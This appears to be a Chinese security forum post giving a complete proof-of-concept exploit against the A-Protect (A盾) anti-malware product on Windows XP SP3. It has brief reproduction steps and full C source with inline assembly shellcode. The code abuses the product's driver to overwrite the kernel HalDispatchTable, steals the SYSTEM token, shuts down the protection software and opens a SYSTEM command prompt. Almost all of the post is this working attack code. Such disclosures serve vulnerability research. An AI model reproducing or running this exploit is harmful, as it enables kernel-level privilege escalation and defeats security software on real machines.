环境:Windows XP SP3 虚拟机
1.打开A-Protect.exe
2.等待A-Protect.exe显示完系统进程信息
3.编译如下代码,双击运行后结束A-Protect.exe,然后得到一个SYSTEM的CMD
#include <Windows.h>
typedef struct _RTL_PROCESS_MODULE_INFORMATION {
HANDLE Section; // Not filled in
PVOID MappedBase;
PVOID ImageBase;
ULONG ImageSize;
ULONG Flags;
USHORT LoadOrderIndex;
USHORT InitOrderIndex;
USHORT LoadCount;
USHORT OffsetToFileName;
UCHAR FullPathName[ 256 ];
} RTL_PROCESS_MODULE_INFORMATION, *PRTL_PROCESS_MODULE_INFORMATION;
typedef struct _RTL_PROCESS_MODULES {
ULONG NumberOfModules;
RTL_PROCESS_MODULE_INFORMATION Modules[ 1 ];
} RTL_PROCESS_MODULES, *PRTL_PROCESS_MODULES;
typedef ULONG ( __stdcall *NtQueryIntervalProfile_ ) ( ULONG, PULONG );
typedef ULONG ( __stdcall *NtQuerySystemInformation_ ) ( ULONG, PVOID, ULONG, PULONG );
typedef ULONG ( __stdcall *NtAllocateVirtualMemory_ ) ( HANDLE, PVOID, ULONG, PULONG, ULONG, ULONG );
NtQueryIntervalProfile_ NtQueryIntervalProfile;
NtAllocateVirtualMemory_ NtAllocateVirtualMemory;
NtQuerySystemInformation_ NtQuerySystemInformation;
ULONG WriteToHalDispatchTable, ZwOpenProcess, ZwOpenProcessTokenEx, ZwDuplicateToken, ZwSetInformationProcess;
ULONG SYSTEMCID[2]={4,0}, ObjectAttributes[6];
HANDLE hSystemProc, hTokenHandle, hNewTokenHandle;
void _declspec(naked) ShellCode()
{
__asm
{
pushad
pushfd
push offset SYSTEMCID
push offset ObjectAttributes
push 0x0400
push offset hSystemProc
call ZwOpenProcess
cmp eax,0
jnz exit0
push offset hTokenHandle
push 0x200
push TOKEN_ALL_ACCESS
push hSystemProc;
call ZwOpenProcessTokenEx
cmp eax,0
jnz exit0
push offset hNewTokenHandle
push TokenPrimary
push 0
push 0
push TOKEN_ALL_ACCESS
push hTokenHandle
call ZwDuplicateToken
cmp eax,0
jnz exit0
push 8
push offset hNewTokenHandle
push 9
push 0xFFFFFFFF
call ZwSetInformationProcess
exit0:
popfd
popad
ret
}
}
#define AProcess_Size 0x683800
WCHAR pSelfEXEPath[MAX_PATH];
UCHAR pBuffer[AProcess_Size];
char pSafe[] = "Safe";
int WINAPI WinMain( HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow )
{
HMODULE ntdll;
ntdll = GetModuleHandle( L"ntdll.dll" );
if ( _stricmp(GetCommandLineA(),"Son") == 0 )
{
HMODULE ntdll = GetModuleHandle( L"ntdll.dll" );
NtQueryIntervalProfile = (NtQueryIntervalProfile_)GetProcAddress( ntdll ,"NtQueryIntervalProfile" );
NtAllocateVirtualMemory = (NtAllocateVirtualMemory_)GetProcAddress( ntdll ,"NtAllocateVirtualMemory" );
NtQuerySystemInformation = ( NtQuerySystemInformation_ )GetProcAddress( ntdll ,"NtQuerySystemInformation" );
if ( NtQueryIntervalProfile == NULL || NtAllocateVirtualMemory == NULL || NtQuerySystemInformation == NULL )
return 0;
//取ntoskrnl的信息,只要调用一次就行
ULONG status, NtoskrnlBase;
RTL_PROCESS_MODULES module;
status = NtQuerySystemInformation( 11, &module, sizeof(RTL_PROCESS_MODULES), NULL);//SystemModuleInformation 11
if ( status != 0xC0000004 ) //STATUS_INFO_LENGTH_MISMATCH
return 0;
NtoskrnlBase = (ULONG)module.Modules[0].ImageBase;
//把ntoskrnl.exe加载进来
HMODULE ntoskrnl;
ntoskrnl = LoadLibraryA( (LPCSTR)( module.Modules[0].FullPathName + module.Modules[0].OffsetToFileName ) );
if ( ntoskrnl == NULL )
return 0;
//计算实际地址
WriteToHalDispatchTable = (ULONG)GetProcAddress(ntoskrnl,"HalDispatchTable") - (ULONG)ntoskrnl + NtoskrnlBase + 4; //需要覆盖的地址
ZwOpenProcess = (ULONG)GetProcAddress(ntoskrnl,"ZwOpenProcess") - (ULONG)ntoskrnl + NtoskrnlBase;
ZwOpenProcessTokenEx = (ULONG)GetProcAddress(ntoskrnl,"ZwOpenProcessTokenEx") - (ULONG)ntoskrnl + NtoskrnlBase;
ZwDuplicateToken = (ULONG)GetProcAddress(ntoskrnl,"ZwDuplicateToken") - (ULONG)ntoskrnl + NtoskrnlBase;
ZwSetInformationProcess = (ULONG)GetProcAddress(ntoskrnl,"ZwSetInformationProcess") - (ULONG)ntoskrnl + NtoskrnlBase;
//以下代码就各显神通了
ReadFile((HANDLE)0x18881111,pSafe,8,NULL,NULL);
LPVOID MyAddress = VirtualAlloc(NULL,0x1000,MEM_COMMIT | MEM_RESERVE | MEM_TOP_DOWN, PAGE_EXECUTE_READWRITE);
if (MyAddress==NULL)
return 0;
memset(MyAddress,0,0x1000);
ULONG Length[7]={0};
Length[0]=-1;
Length[6]=(ULONG)MyAddress;
Length[7]=WriteToHalDispatchTable;
ReadFile((HANDLE)0x18881191,0,(ULONG)Length,NULL,NULL);
memcpy( MyAddress, ShellCode, 200 );
//触发,弹出SYSTEM的CMD
NtQueryIntervalProfile( 2, &status );
STARTUPINFO si;
PROCESS_INFORMATION pii;
ZeroMemory( &si, sizeof(si) );
si.cb = sizeof(si);
ZeroMemory( &pii, sizeof(pii) );
CreateProcess( L"C:\\windows\\system32\\cmd.exe", NULL, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pii );
}
else
{
HWND hWnd;
hWnd = FindWindow(NULL,L"A盾电脑防护 LE 2012-0.3.1");
if ( hWnd == NULL )
return 0;
PostMessage(hWnd,WM_CLOSE,0,0);
for ( int i = 0; i < 10; i++ )
{
Sleep(1000);
hWnd = FindWindow(NULL,L"A盾电脑防护");
if ( hWnd != NULL )
{
PostMessage(hWnd,WM_KEYDOWN,VK_RETURN,0);
break;
}
}
GetModuleFileName(NULL,pSelfEXEPath,MAX_PATH);
HANDLE hSelfFile = CreateFile(pSelfEXEPath, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
if ( hSelfFile == INVALID_HANDLE_VALUE )
return 0;
ULONG uFileSize = GetFileSize(hSelfFile,NULL);
if ( uFileSize == INVALID_FILE_SIZE )
return 0;
ULONG dwResult;
if ( ReadFile(hSelfFile,pBuffer,uFileSize,&dwResult,NULL) == 0 )
return 0;
HANDLE hTargetFile = CreateFile( L"C:\\1.exe", GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
if (hTargetFile == INVALID_HANDLE_VALUE)
return 0;
if(!WriteFile (hTargetFile, pBuffer, AProcess_Size, &dwResult, NULL))
return 0;
CloseHandle(hSelfFile);
CloseHandle(hTargetFile);
STARTUPINFO si;
PROCESS_INFORMATION pii;
ZeroMemory( &si, sizeof(si) );
si.cb = sizeof(si);
ZeroMemory( &pii, sizeof(pii) );
CreateProcess( L"C:\\1.exe", L"Son", NULL, NULL, FALSE, 0, NULL, NULL, &si, &pii );
}
return 0;
}
不玩了,学习A盾开源的代码去了。
[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!